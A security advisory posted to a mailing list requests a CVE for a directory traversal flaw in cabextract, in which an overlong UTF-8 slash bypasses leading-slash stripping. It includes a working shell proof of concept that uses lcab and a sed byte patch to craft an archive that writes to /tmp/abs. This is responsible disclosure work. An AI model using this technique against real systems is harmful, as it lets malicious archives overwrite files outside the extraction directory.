CVE Request: cabextract -- directory traversal

[Alexander Cherepanov <ch3root () openwall com>]

Hi!

cabextract is susceptible to a directory traversal vulnerability. While 
extracting files from an archive, it removes leading slashes from 
filenames but does it before possibly decoding UTF-8 and doesn't check 
for invalid UTF-8. Hence an absolute filename can be shoved through by 
using overlong encoding for the leading slash (and setting utf8 
attribute in the header). This can be exploited by a malicious archive 
to write files outside the current directory.

Illustration:

$ touch xxxxxxxxxx
$ lcab xxxxxxxxxx test.cab
$ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab
$ rm xxxxxxxxxx

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ ./cabextract test.cab
Extracting cabinet: test.cab
  extracting /tmp/abs

All done, no errors.

$ ls /tmp/abs
/tmp/abs

In the sed command above, \xe0\x80\xaf is an overlong encoding for '/', 
\xa0\x00 are flags updated to include utf-8 flag.

The issue was found in cabextract 1.4 and 2-byte encoding (\xc0\xaf) was 
enough to hide '/'. cabextract 1.5 tightened utf-8 checks and 3-byte 
encoding is now necessary.

The issue was reported to Stuart Caie today and fixed in less than 4h:

http://sourceforge.net/p/libmspack/code/217/

Another release of cabextract is expected in the next few days.

Could CVE please be assigned?

--
Alexander Cherepanov